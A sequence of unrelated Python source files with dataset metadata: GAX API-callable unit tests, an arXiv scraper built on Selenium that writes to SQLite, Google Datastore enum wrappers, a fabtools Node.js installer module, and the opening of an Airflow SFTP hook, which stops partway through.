_SERVICE_NAME = 'test.interface.v1.api'
_A_CONFIG = {
'interfaces': {
_SERVICE_NAME: {
'retry_codes': {
'foo_retry': ['code_a', 'code_b'],
'bar_retry': ['code_c']
},
'retry_params': {
'default': {
'initial_retry_delay_millis': 100,
'retry_delay_multiplier': 1.2,
'max_retry_delay_millis': 1000,
'initial_rpc_timeout_millis': 300,
'rpc_timeout_multiplier': 1.3,
'max_rpc_timeout_millis': 3000,
'total_timeout_millis': 30000
}
},
'methods': {
# Note that GAX should normalize this to snake case
'BundlingMethod': {
'retry_codes_name': 'foo_retry',
'retry_params_name': 'default',
'timeout_millis': 25000,
'bundling': {
'element_count_threshold': 6,
'element_count_limit': 10
}
},
'PageStreamingMethod': {
'retry_codes_name': 'bar_retry',
'retry_params_name': 'default',
'timeout_millis': 12000
}
}
}
}
}
_PAGE_DESCRIPTORS = {
'page_streaming_method': PageDescriptor(
'page_token', 'next_page_token', 'page_streams')
}
_BUNDLE_DESCRIPTORS = {'bundling_method': BundleDescriptor('bundled_field', [])}
_RETRY_DICT = {'code_a': Exception,
'code_b': Exception,
'code_c': Exception}
_FAKE_STATUS_CODE_1 = object()
_FAKE_STATUS_CODE_2 = object()
class CustomException(Exception):
def __init__(self, msg, code):
super(CustomException, self).__init__(msg)
self.code = code
class AnotherException(Exception):
pass
class TestCreateApiCallable(unittest2.TestCase):
def test_call_api_call(self):
settings = CallSettings()
my_callable = api_callable.create_api_call(
lambda _req, _timeout: 42, settings)
self.assertEqual(my_callable(None), 42)
def test_call_override(self):
settings = CallSettings(timeout=10)
my_callable = api_callable.create_api_call(
lambda _req, timeout: timeout, settings)
self.assertEqual(my_callable(None, CallOptions(timeout=20)), 20)
def test_call_kwargs(self):
settings = CallSettings(kwargs={'key': 'value'})
my_callable = api_callable.create_api_call(
lambda _req, _timeout, **kwargs: kwargs['key'], settings)
self.assertEqual(my_callable(None), 'value')
self.assertEqual(my_callable(None, CallOptions(key='updated')),
'updated')
@mock.patch('time.time')
@mock.patch('google.gax.config.exc_to_code')
def test_retry(self, mock_exc_to_code, mock_time):
mock_exc_to_code.side_effect = lambda e: e.code
to_attempt = 3
retry = RetryOptions(
[_FAKE_STATUS_CODE_1],
BackoffSettings(0, 0, 0, 0, 0, 0, 1))
# Succeeds on the to_attempt'th call, and never again afterward
mock_call = mock.Mock()
mock_call.side_effect = ([CustomException('', _FAKE_STATUS_CODE_1)] *
(to_attempt - 1) + [mock.DEFAULT])
mock_call.return_value = 1729
mock_time.return_value = 0
settings = CallSettings(timeout=0, retry=retry)
my_callable = api_callable.create_api_call(mock_call, settings)
self.assertEqual(my_callable(None), 1729)
self.assertEqual(mock_call.call_count, to_attempt)
@mock.patch('time.time')
def test_no_retry_if_no_codes(self, mock_time):
retry = RetryOptions([], BackoffSettings(1, 2, 3, 4, 5, 6, 7))
mock_call = mock.Mock()
mock_call.side_effect = CustomException('', _FAKE_STATUS_CODE_1)
mock_time.return_value = 0
settings = CallSettings(timeout=0, retry=retry)
my_callable = api_callable.create_api_call(mock_call, settings)
self.assertRaises(CustomException, my_callable, None)
self.assertEqual(mock_call.call_count, 1)
@mock.patch('time.time')
@mock.patch('google.gax.config.exc_to_code')
def test_retry_aborts_simple(self, mock_exc_to_code, mock_time):
def fake_call(dummy_request, dummy_timeout):
raise CustomException('', _FAKE_STATUS_CODE_1)
retry = RetryOptions(
[_FAKE_STATUS_CODE_1],
BackoffSettings(0, 0, 0, 0, 0, 0, 1))
mock_time.side_effect = [0, 2]
mock_exc_to_code.side_effect = lambda e: e.code
settings = CallSettings(timeout=0, retry=retry)
my_callable = api_callable.create_api_call(fake_call, settings)
try:
my_callable(None)
except RetryError as exc:
self.assertIsInstance(exc.cause, CustomException)
@mock.patch('time.time')
@mock.patch('google.gax.config.exc_to_code')
def test_retry_times_out_simple(self, mock_exc_to_code, mock_time):
mock_exc_to_code.side_effect = lambda e: e.code
to_attempt = 3
retry = RetryOptions(
[_FAKE_STATUS_CODE_1],
BackoffSettings(0, 0, 0, 0, 0, 0, 1))
mock_call = mock.Mock()
mock_call.side_effect = CustomException('', _FAKE_STATUS_CODE_1)
mock_time.side_effect = ([0] * to_attempt + [2])
settings = CallSettings(timeout=0, retry=retry)
my_callable = api_callable.create_api_call(mock_call, settings)
try:
my_callable(None)
except RetryError as exc:
self.assertIsInstance(exc.cause, CustomException)
self.assertEqual(mock_call.call_count, to_attempt)
@mock.patch('time.time')
@mock.patch('google.gax.config.exc_to_code')
def test_retry_aborts_on_unexpected_exception(
self, mock_exc_to_code, mock_time):
mock_exc_to_code.side_effect = lambda e: e.code
retry = RetryOptions(
[_FAKE_STATUS_CODE_1],
BackoffSettings(0, 0, 0, 0, 0, 0, 1))
mock_call = mock.Mock()
mock_call.side_effect = CustomException('', _FAKE_STATUS_CODE_2)
mock_time.return_value = 0
settings = CallSettings(timeout=0, retry=retry)
my_callable = api_callable.create_api_call(mock_call, settings)
self.assertRaises(Exception, my_callable, None)
self.assertEqual(mock_call.call_count, 1)
@mock.patch('time.time')
def test_retry_times_out_no_response(self, mock_time):
mock_time.return_value = 1
retry = RetryOptions(
[_FAKE_STATUS_CODE_1],
BackoffSettings(0, 0, 0, 0, 0, 0, 0))
settings = CallSettings(timeout=0, retry=retry)
my_callable = api_callable.create_api_call(lambda: None, settings)
self.assertRaises(RetryError, my_callable, None)
@mock.patch('time.sleep')
@mock.patch('time.time')
@mock.patch('google.gax.config.exc_to_code')
def test_retry_exponential_backoff(self, mock_exc_to_code, mock_time,
mock_sleep):
# pylint: disable=too-many-locals
mock_exc_to_code.side_effect = lambda e: e.code
MILLIS_PER_SEC = 1000
mock_time.return_value = 0
def incr_time(secs):
mock_time.return_value += secs
def api_call(dummy_request, timeout, **dummy_kwargs):
incr_time(timeout)
raise CustomException(str(timeout), _FAKE_STATUS_CODE_1)
mock_call = mock.Mock()
mock_sleep.side_effect = incr_time
mock_call.side_effect = api_call
params = BackoffSettings(3, 2, 24, 5, 2, 80, 2500)
retry = RetryOptions([_FAKE_STATUS_CODE_1], params)
settings = CallSettings(timeout=0, retry=retry)
my_callable = api_callable.create_api_call(mock_call, settings)
try:
my_callable(None)
except RetryError as exc:
self.assertIsInstance(exc.cause, CustomException)
self.assertGreaterEqual(mock_time(),
params.total_timeout_millis / MILLIS_PER_SEC)
# Very rough bounds
calls_lower_bound = params.total_timeout_millis / (
params.max_retry_delay_millis + params.max_rpc_timeout_millis)
self.assertGreater(mock_call.call_count, calls_lower_bound)
calls_upper_bound = (params.total_timeout_millis /
params.initial_retry_delay_millis)
self.assertLess(mock_call.call_count, calls_upper_bound)
def test_page_streaming(self):
# A mock grpc function that page streams a list of consecutive
# integers, returning `page_size` integers with each call and using
# the next integer to return as the page token, until `pages_to_stream`
# pages have been returned.
# pylint:disable=too-many-locals
page_size = 3
pages_to_stream = 5
# pylint: disable=abstract-method, too-few-public-methods
class PageStreamingRequest(object):
def __init__(self, page_token=0):
self.page_token = page_token
class PageStreamingResponse(object):
def __init__(self, nums=(), next_page_token=0):
self.nums = nums
self.next_page_token = next_page_token
fake_grpc_func_descriptor = PageDescriptor(
'page_token', 'next_page_token', 'nums')
def grpc_return_value(request, *dummy_args, **dummy_kwargs):
start = int(request.page_token)
if start > 0 and start < page_size * pages_to_stream:
return PageStreamingResponse(
nums=list(range(start,
start + page_size)),
next_page_token=start + page_size)
elif start >= page_size * pages_to_stream:
return PageStreamingResponse()
else:
return PageStreamingResponse(nums=list(range(page_size)),
next_page_token=page_size)
with mock.patch('grpc.UnaryUnaryMultiCallable') as mock_grpc:
mock_grpc.side_effect = grpc_return_value
settings = CallSettings(
page_descriptor=fake_grpc_func_descriptor, timeout=0)
my_callable = api_callable.create_api_call(
mock_grpc, settings=settings)
self.assertEqual(list(my_callable(PageStreamingRequest())),
list(range(page_size * pages_to_stream)))
unflattened_option = CallOptions(page_token=INITIAL_PAGE)
# Expect a list of pages_to_stream pages, each of size page_size,
# plus one empty page
expected = [list(range(page_size * n, page_size * (n + 1)))
for n in range(pages_to_stream)] + [()]
self.assertEqual(list(my_callable(PageStreamingRequest(),
unflattened_option)),
expected)
pages_already_read = 2
explicit_page_token_option = CallOptions(
page_token=str(page_size * pages_already_read))
# Expect a list of pages_to_stream pages, each of size page_size,
# plus one empty page, minus the pages_already_read
expected = [list(range(page_size * n, page_size * (n + 1)))
for n in range(pages_already_read, pages_to_stream)]
expected += [()]
self.assertEqual(list(my_callable(PageStreamingRequest(),
explicit_page_token_option)),
expected)
def test_bundling_page_streaming_error(self):
settings = CallSettings(
page_descriptor=object(), bundle_descriptor=object(),
bundler=object())
with self.assertRaises(ValueError):
api_callable.create_api_call(lambda _req, _timeout: 42, settings)
def test_bundling(self):
# pylint: disable=abstract-method, too-few-public-methods
class BundlingRequest(object):
def __init__(self, elements=None):
self.elements = elements
fake_grpc_func_descriptor = BundleDescriptor('elements', [])
bundler = bundling.Executor(BundleOptions(element_count_threshold=8))
def my_func(request, dummy_timeout):
return len(request.elements)
settings = CallSettings(
bundler=bundler, bundle_descriptor=fake_grpc_func_descriptor,
timeout=0)
my_callable = api_callable.create_api_call(my_func, settings)
first = my_callable(BundlingRequest([0] * 3))
self.assertIsInstance(first, bundling.Event)
self.assertIsNone(first.result) # pylint: disable=no-member
second = my_callable(BundlingRequest([0] * 5))
self.assertEqual(second.result, 8) # pylint: disable=no-member
def test_construct_settings(self):
defaults = api_callable.construct_settings(
_SERVICE_NAME, _A_CONFIG, dict(), _RETRY_DICT,
bundle_descriptors=_BUNDLE_DESCRIPTORS,
page_descriptors=_PAGE_DESCRIPTORS,
kwargs={'key1': 'value1'})
settings = defaults['bundling_method']
self.assertAlmostEqual(settings.timeout, 25.0)
self.assertIsInstance(settings.bundler, bundling.Executor)
self.assertIsInstance(settings.bundle_descriptor, BundleDescriptor)
self.assertIsNone(settings.page_descriptor)
self.assertIsInstance(settings.retry, RetryOptions)
self.assertEqual(settings.kwargs, {'key1': 'value1'})
settings = defaults['page_streaming_method']
self.assertAlmostEqual(settings.timeout, 12.0)
self.assertIsNone(settings.bundler)
self.assertIsNone(settings.bundle_descriptor)
self.assertIsInstance(settings.page_descriptor, PageDescriptor)
self.assertIsInstance(settings.retry, RetryOptions)
self.assertEqual(settings.kwargs, {'key1': 'value1'})
def test_construct_settings_override(self):
_override = {
'interfaces': {
_SERVICE_NAME: {
'methods': {
'PageStreamingMethod': None,
'BundlingMethod': {
'timeout_millis': 8000,
'bundling': None
}
}
}
}
}
defaults = api_callable.construct_settings(
_SERVICE_NAME, _A_CONFIG, _override, _RETRY_DICT,
bundle_descriptors=_BUNDLE_DESCRIPTORS,
page_descriptors=_PAGE_DESCRIPTORS)
settings = defaults['bundling_method']
self.assertAlmostEqual(settings.timeout, 8.0)
self.assertIsNone(settings.bundler)
self.assertIsNone(settings.page_descriptor)
settings = defaults['page_streaming_method']
self.assertAlmostEqual(settings.timeout, 12.0)
self.assertIsInstance(settings.page_descriptor, PageDescriptor)
self.assertIsNone(settings.retry)
def test_construct_settings_override2(self):
_override = {
'interfaces': {
_SERVICE_NAME: {
'retry_codes': {
'bar_retry': [],
'baz_retry': ['code_a']
},
'retry_params': {
'default': {
'initial_retry_delay_millis': 1000,
'retry_delay_multiplier': 1.2,
'max_retry_delay_millis': 10000,
'initial_rpc_timeout_millis': 3000,
'rpc_timeout_multiplier': 1.3,
'max_rpc_timeout_millis': 30000,
'total_timeout_millis': 300000
},
},
'methods': {
'BundlingMethod': {
'retry_params_name': 'default',
'retry_codes_name': 'baz_retry',
},
},
}
}
}
defaults = api_callable.construct_settings(
_SERVICE_NAME, _A_CONFIG, _override, _RETRY_DICT,
bundle_descriptors=_BUNDLE_DESCRIPTORS,
page_descriptors=_PAGE_DESCRIPTORS)
settings = defaults['bundling_method']
backoff = settings.retry.backoff_settings
self.assertEqual(backoff.initial_retry_delay_millis, 1000)
self.assertEqual(settings.retry.retry_codes, [_RETRY_DICT['code_a']])
self.assertIsInstance(settings.bundler, bundling.Executor)
self.assertIsInstance(settings.bundle_descriptor, BundleDescriptor)
# page_streaming_method is unaffected because it's not specified in
# overrides. 'bar_retry' or 'default' definitions in overrides should
# not affect the methods which are not in the overrides.
settings = defaults['page_streaming_method']
backoff = settings.retry.backoff_settings
self.assertEqual(backoff.initial_retry_delay_millis, 100)
self.assertEqual(backoff.retry_delay_multiplier, 1.2)
self.assertEqual(backoff.max_retry_delay_millis, 1000)
self.assertEqual(settings.retry.retry_codes, [_RETRY_DICT['code_c']])
@mock.patch('google.gax.config.API_ERRORS', (CustomException, ))
def test_catch_error(self):
def abortion_error_func(*dummy_args, **dummy_kwargs):
raise CustomException(None, None)
def other_error_func(*dummy_args, **dummy_kwargs):
raise AnotherException
gax_error_callable = api_callable.create_api_call(
abortion_error_func, CallSettings())
self.assertRaises(GaxError, gax_error_callable, None)
other_error_callable = api_callable.create_api_call(
other_error_func, CallSettings())
self.assertRaises(AnotherException, other_error_callable, None)
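# --- Illustrative usage sketch (editor's addition, not part of the original test file) ---
# A minimal, hypothetical example of wrapping a plain function with
# api_callable.create_api_call, mirroring test_call_api_call and
# test_call_override above. The function name `echo` is an assumption made
# only for illustration.
def _example_create_api_call_usage():
    def echo(request, timeout):
        return request, timeout
    settings = CallSettings(timeout=30)
    wrapped = api_callable.create_api_call(echo, settings)
    assert wrapped('ping') == ('ping', 30)                         # timeout from CallSettings
    assert wrapped('ping', CallOptions(timeout=5)) == ('ping', 5)  # per-call override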
| 41.603696
| 85
| 0.62529
|
aa4ad0686bd5cf027b648b832c303dbf869916af
| 10,653
|
py
|
Python
|
app/scraper.py
|
PyDataBlog/arxiv-classifier
|
a903fc00aeb458e23937f69b5a429ea6fed4464e
|
[
"MIT"
] | null | null | null |
app/scraper.py
|
PyDataBlog/arxiv-classifier
|
a903fc00aeb458e23937f69b5a429ea6fed4464e
|
[
"MIT"
] | null | null | null |
app/scraper.py
|
PyDataBlog/arxiv-classifier
|
a903fc00aeb458e23937f69b5a429ea6fed4464e
|
[
"MIT"
] | null | null | null |
import os
import time
import pandas as pd
import numpy as np
import sqlite3
import platform
from tqdm import tqdm
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
def scrape_data(driver, categories, arxiv_identifier):
    """
    Scrape the most recent arXiv listings for each category and store the
    combined metadata in the project's SQLite database.
    """
    # Initiate master dataframe
    main_df = pd.DataFrame()
    for cat, link_name in tqdm(zip(categories, arxiv_identifier)):
url = f'https://export.arxiv.org/list/{link_name}/recent'
driver.get(url)
try:
# Wait until the 'all' link is accessible, get this link and click it
all_link = WebDriverWait(driver, 15).until(
EC.presence_of_element_located((By.XPATH, '//*[@id="dlpage"]/small[2]/a[3]'))
)
all_link.click()
except TimeoutException:
            # Subjects without an 'all' link already display all of their data
pass
# Get the html for the current url
time.sleep(2)
html = driver.page_source
# Parse the html with BeautifulSoup
soup = BeautifulSoup(html, 'html.parser')
time.sleep(2)
# Find the main containers
all_dl = soup.find_all('dl')
for dl in all_dl:
# Initiate empty list to contain metadata
all_titles = []
abstract_links = []
download_links = []
abstract_data = []
authors_data = []
submission_data = []
subjects_data = []
# Titles
for x in dl.find_all('dd'):
# list of all titles
titles = [x.text.replace('Title: ', '').strip() for x in x.find_all('div', {'class': 'list-title mathjax'})]
# Append titles to all titles list
for t in titles:
all_titles.append(t)
# Links for abstract, pdf
for x in dl.find_all('dt'):
all_article_links = x.find_all('a', href=True)
link_list = ['https://export.arxiv.org' + link['href'] for link in all_article_links][0:2]
# Append abstract url to abstract links
abstract_url = link_list[0]
abstract_links.append(abstract_url)
# Append download url to abstract link list
download_url = link_list[1]
download_links.append(download_url)
# Subjects
for x in dl.find_all('div', {'class': 'list-subjects'}):
subjects = x.text.strip().replace('Subjects: ', '')
subjects_data.append(subjects)
# Scrape the abstract meta-data
for link in abstract_links:
try:
driver.get(link)
# Abstract text
abstract_block = WebDriverWait(driver, 90).until(
EC.presence_of_element_located((By.XPATH, '//*[@id="abs"]/div[2]/blockquote'))
)
abstract_text = abstract_block.text
abstract_text = abstract_text.replace('Abstract: ', '')
# Authors text
WebDriverWait(driver, 90).until(
EC.presence_of_element_located((By.CSS_SELECTOR, '#abs > div.leftcolumn > div.authors'))
)
authors_text = driver.find_element_by_css_selector('#abs > div.leftcolumn > div.authors').text
# Submission date text
WebDriverWait(driver, 90).until(
EC.presence_of_element_located((By.CSS_SELECTOR, '#abs > div.leftcolumn > div.dateline'))
)
submission_date_text = driver.find_element_by_css_selector('#abs > div.leftcolumn > div.dateline').text
except Exception as e:
print(e)
# Set authors, abstract and submission info to NaN if scraping fails
authors_text = np.NaN
abstract_text = np.NaN
submission_date_text = np.NaN
# Append metadata info to the main data lists
abstract_data.append(abstract_text)
authors_data.append(authors_text)
submission_data.append(submission_date_text)
# Convert meta-data into a dataframe
df = pd.DataFrame({'title': all_titles,
'download_url': download_links,
'abstract_link': abstract_links,
'abstract_text': abstract_data,
'authors': authors_data,
'submission_date': submission_data,
'subjects': subjects_data})
# Tag the current subject
df['subject_tag'] = cat
# Append the subject dataframe to the main dataframe
main_df = main_df.append(df)
time.sleep(3)
# Reset index and export data
main_df = main_df.reset_index(drop=True)
# Push scraped data to db
with sqlite3.connect(os.path.join('app', 'data', 'arxiv.sqlite')) as conn:
main_df.to_sql('raw_data', if_exists='replace', con=conn, index=False)
# Exit application
driver.quit()
print('Done scraping all the data')
def fill_missing_data(driver):
    """
    Re-scrape the abstract pages whose metadata is missing and write the
    cleaned, combined table back to the SQLite database.
    """
with sqlite3.connect(os.path.join('app', 'data', 'arxiv.sqlite')) as conn:
missing_df = pd.read_sql_query('SELECT * FROM raw_data WHERE abstract_text IS NULL', con=conn)
main_df = pd.read_sql_query('SELECT * FROM raw_data WHERE abstract_text IS NOT NULL', con=conn)
abstract_data = []
authors_data = []
submission_data = []
for link in tqdm(missing_df['abstract_link'].values.tolist()):
try:
driver.get(link)
# Abstract text
abstract_block = WebDriverWait(driver, 90).until(
EC.presence_of_element_located((By.XPATH, '//*[@id="abs"]/div[2]/blockquote'))
)
abstract_text = abstract_block.text
abstract_text = abstract_text.replace('Abstract: ', '')
# Authors text
WebDriverWait(driver, 90).until(
EC.presence_of_element_located((By.CSS_SELECTOR, '#abs > div.leftcolumn > div.authors'))
)
authors_text = driver.find_element_by_css_selector('#abs > div.leftcolumn > div.authors').text
# Submission date text
WebDriverWait(driver, 90).until(
EC.presence_of_element_located((By.CSS_SELECTOR, '#abs > div.leftcolumn > div.dateline'))
)
submission_date_text = driver.find_element_by_css_selector('#abs > div.leftcolumn > div.dateline').text
except Exception as e:
print(e)
authors_text = np.NaN
abstract_text = np.NaN
submission_date_text = np.NaN
# Append metadata info to the main data lists
abstract_data.append(abstract_text)
authors_data.append(authors_text)
submission_data.append(submission_date_text)
    new_df = pd.DataFrame({'abstract_text': abstract_data,
                           'authors': authors_data,
                           'submission_date': submission_data})
missing_df.loc[:, 'abstract_text'] = new_df['abstract_text']
missing_df.loc[:, 'authors'] = new_df['authors']
missing_df.loc[:, 'submission_date'] = new_df['submission_date']
master_df = pd.concat([main_df, missing_df])
print(master_df.info())
with sqlite3.connect(os.path.join('app', 'data', 'arxiv.sqlite')) as conn:
#clean_df = master_df.drop_duplicates(subset='title').reset_index(drop=True)
master_df.to_sql('clean_data', con=conn, if_exists='replace', index=False)
driver.quit()
if __name__ == "__main__":
# Specify webdriver options
options = webdriver.FirefoxOptions()
    options.headless = True  # run the browser in headless mode
#options.add_argument('window-size=1200x600') # set the window size
os_platform = platform.system()
if os_platform == 'Linux':
# Specify Linux path for the webdriver executable
linux_path = os.path.join('app', 'linux-drivers', 'geckodriver')
        # Initiate headless scraping in a Linux environment
driver = webdriver.Firefox(executable_path = linux_path,
options=options)
elif os_platform == 'Darwin':
        # Specify Mac path for the geckodriver executable
mac_path = os.path.join('app', 'mac-drivers', 'geckodriver')
        # Initiate headless scraping in a Darwin/Mac environment
driver = webdriver.Firefox(executable_path = mac_path,
options=options)
elif os_platform == 'Windows':
        # Specify Windows path for the geckodriver executable
windows_path = os.path.join('app', 'windows-drivers', 'geckodriver.exe')
        # Initiate headless scraping in a Windows environment
driver = webdriver.Firefox(executable_path = windows_path,
options=options)
else:
raise OSError('Unsupported OS Platform. Only Linux/Mac/Windows firefox drivers supported!')
main_categories = [
'Economics', 'Quantitative Biology', 'Quantitative Finance',
'Statistics', 'Electrical Engineering', 'Mathematics',
'Computer Science', 'Physics', 'Astrophysics', 'Condensed Matter',
'General Relativity & Quantum Cosmology', 'High Energy Physics - Experiment',
'High Energy Physics - Lattice', 'High Energy Physics - Phenomenology',
'High Energy Physics - Theory', 'Mathematical Physics',
'Nonlinear Sciences', 'Nuclear Experiment', 'Nuclear Theory',
'Quantum Physics'
]
arxiv_names = [
'econ', 'q-bio', 'q-fin',
'stat', 'eess', 'math',
'cs', 'physics', 'astro-ph',
'cond-mat', 'gr-qc', 'hep-ex',
'hep-lat', 'hep-ph', 'hep-th',
'math-ph', 'nlin', 'nucl-ex',
'nucl-th', 'quant-ph'
]
"""
# Only used for testing
main_categories = ['Economics']
arxiv_names = ['econ']
"""
#scrape_data(driver = driver, categories = main_categories, arxiv_identifier = arxiv_names)
fill_missing_data(driver = driver)
| 35.989865
| 124
| 0.589411
|
7aa90c136e1c862df32efb4d3d4f83d0c2e2124e
| 4,871
|
py
|
Python
|
datastore/google/cloud/datastore_v1/gapic/enums.py
|
di/google-cloud-python
|
a0bd8d0565e2a682760a113c59ce12b872bce9ab
|
[
"Apache-2.0"
] | 1
|
2019-05-23T11:25:32.000Z
|
2019-05-23T11:25:32.000Z
|
datastore/google/cloud/datastore_v1/gapic/enums.py
|
di/google-cloud-python
|
a0bd8d0565e2a682760a113c59ce12b872bce9ab
|
[
"Apache-2.0"
] | null | null | null |
datastore/google/cloud/datastore_v1/gapic/enums.py
|
di/google-cloud-python
|
a0bd8d0565e2a682760a113c59ce12b872bce9ab
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrappers for protocol buffer enum types."""
import enum
class CommitRequest(object):
class Mode(enum.IntEnum):
"""
The modes available for commits.
Attributes:
MODE_UNSPECIFIED (int): Unspecified. This value must not be used.
TRANSACTIONAL (int): Transactional: The mutations are either all applied, or none are
applied. Learn about transactions
`here <https://cloud.google.com/datastore/docs/concepts/transactions>`__.
NON_TRANSACTIONAL (int): Non-transactional: The mutations may not apply as all or none.
"""
MODE_UNSPECIFIED = 0
TRANSACTIONAL = 1
NON_TRANSACTIONAL = 2
class ReadOptions(object):
class ReadConsistency(enum.IntEnum):
"""
The possible values for read consistencies.
Attributes:
READ_CONSISTENCY_UNSPECIFIED (int): Unspecified. This value must not be used.
STRONG (int): Strong consistency.
EVENTUAL (int): Eventual consistency.
"""
READ_CONSISTENCY_UNSPECIFIED = 0
STRONG = 1
EVENTUAL = 2
class EntityResult(object):
class ResultType(enum.IntEnum):
"""
Specifies what data the 'entity' field contains. A ``ResultType`` is
either implied (for example, in ``LookupResponse.missing`` from
``datastore.proto``, it is always ``KEY_ONLY``) or specified by context
(for example, in message ``QueryResultBatch``, field
``entity_result_type`` specifies a ``ResultType`` for all the values in
field ``entity_results``).
Attributes:
RESULT_TYPE_UNSPECIFIED (int): Unspecified. This value is never used.
FULL (int): The key and properties.
PROJECTION (int): A projected subset of properties. The entity may have no key.
KEY_ONLY (int): Only the key.
"""
RESULT_TYPE_UNSPECIFIED = 0
FULL = 1
PROJECTION = 2
KEY_ONLY = 3
class PropertyOrder(object):
class Direction(enum.IntEnum):
"""
The sort direction.
Attributes:
DIRECTION_UNSPECIFIED (int): Unspecified. This value must not be used.
ASCENDING (int): Ascending.
DESCENDING (int): Descending.
"""
DIRECTION_UNSPECIFIED = 0
ASCENDING = 1
DESCENDING = 2
class CompositeFilter(object):
class Operator(enum.IntEnum):
"""
A composite filter operator.
Attributes:
OPERATOR_UNSPECIFIED (int): Unspecified. This value must not be used.
AND (int): The results are required to satisfy each of the combined filters.
"""
OPERATOR_UNSPECIFIED = 0
AND = 1
class PropertyFilter(object):
class Operator(enum.IntEnum):
"""
A property filter operator.
Attributes:
OPERATOR_UNSPECIFIED (int): Unspecified. This value must not be used.
LESS_THAN (int): Less than.
LESS_THAN_OR_EQUAL (int): Less than or equal.
GREATER_THAN (int): Greater than.
GREATER_THAN_OR_EQUAL (int): Greater than or equal.
EQUAL (int): Equal.
HAS_ANCESTOR (int): Has ancestor.
"""
OPERATOR_UNSPECIFIED = 0
LESS_THAN = 1
LESS_THAN_OR_EQUAL = 2
GREATER_THAN = 3
GREATER_THAN_OR_EQUAL = 4
EQUAL = 5
HAS_ANCESTOR = 11
class QueryResultBatch(object):
class MoreResultsType(enum.IntEnum):
"""
The possible values for the ``more_results`` field.
Attributes:
MORE_RESULTS_TYPE_UNSPECIFIED (int): Unspecified. This value is never used.
NOT_FINISHED (int): There may be additional batches to fetch from this query.
MORE_RESULTS_AFTER_LIMIT (int): The query is finished, but there may be more results after the limit.
MORE_RESULTS_AFTER_CURSOR (int): The query is finished, but there may be more results after the end
cursor.
NO_MORE_RESULTS (int): The query is finished, and there are no more results.
"""
MORE_RESULTS_TYPE_UNSPECIFIED = 0
NOT_FINISHED = 1
MORE_RESULTS_AFTER_LIMIT = 2
MORE_RESULTS_AFTER_CURSOR = 4
NO_MORE_RESULTS = 3
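# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# These wrappers are plain IntEnum classes, so members compare equal to the raw
# protobuf integer values and either form can be used when building requests.
def _example_enum_usage():
    mode = CommitRequest.Mode.TRANSACTIONAL
    assert mode == 1                      # IntEnum members equal their int value
    assert mode.name == 'TRANSACTIONAL'
    consistency = ReadOptions.ReadConsistency.EVENTUAL
    assert int(consistency) == 2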
| 33.826389
| 111
| 0.642579
|
ef9dfd3fb01c6e03c8af8192f16a18700c47c8ec
| 1,489
|
py
|
Python
|
fabtools/require/nodejs.py
|
return1/fabtools
|
a0c07852054efd7c795f0057689b249333498ef8
|
[
"BSD-2-Clause"
] | 1
|
2020-11-05T21:53:21.000Z
|
2020-11-05T21:53:21.000Z
|
fabtools/require/nodejs.py
|
return1/fabtools
|
a0c07852054efd7c795f0057689b249333498ef8
|
[
"BSD-2-Clause"
] | null | null | null |
fabtools/require/nodejs.py
|
return1/fabtools
|
a0c07852054efd7c795f0057689b249333498ef8
|
[
"BSD-2-Clause"
] | null | null | null |
"""
Node.js
=======
This module provides tools for installing `Node.js`_ and managing
packages using `npm`_.
.. note:: the ``simplejson`` module is required on Python 2.5
.. _Node.js: http://nodejs.org/
.. _npm: http://npmjs.org/
"""
from fabtools import nodejs
def installed_from_source(version=nodejs.DEFAULT_VERSION):
"""
Require Node.js to be installed from source.
::
from fabtools import require
require.nodejs.installed_from_source()
"""
if nodejs.version() != version:
nodejs.install_from_source(version)
def package(pkg_name, version=None, local=False):
"""
Require a Node.js package.
If the package is not installed, and no *version* is specified, the
latest available version will be installed.
If a *version* is specified, and a different version of the package
is already installed, it will be updated to the specified version.
If `local` is ``True``, the package will be installed locally.
::
from fabtools import require
# Install package system-wide
require.nodejs.package('foo')
# Install package locally
require.nodejs.package('bar', local=True)
"""
pkg_version = nodejs.package_version(pkg_name, local=local)
if version:
if pkg_version != version:
nodejs.install_package(pkg_name, version, local=local)
else:
if pkg_version is None:
nodejs.install_package(pkg_name, local=local)
| 24.016129
| 71
| 0.667562
|
0de587209814d3560982f2aba89416b22c88fd9f
| 12,041
|
py
|
Python
|
airflow/providers/sftp/hooks/sftp.py
|
cmarteepants/airflow
|
577c3d169cc7ee20c72a0d51a81989b562ab09af
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
airflow/providers/sftp/hooks/sftp.py
|
cmarteepants/airflow
|
577c3d169cc7ee20c72a0d51a81989b562ab09af
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
airflow/providers/sftp/hooks/sftp.py
|
cmarteepants/airflow
|
577c3d169cc7ee20c72a0d51a81989b562ab09af
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module contains SFTP hook."""
import datetime
import stat
from typing import Dict, List, Optional, Tuple
import pysftp
import tenacity
from paramiko import SSHException
from airflow.providers.ssh.hooks.ssh import SSHHook
class SFTPHook(SSHHook):
"""
This hook is inherited from SSH hook. Please refer to SSH hook for the input
arguments.
Interact with SFTP. Aims to be interchangeable with FTPHook.
:Pitfalls::
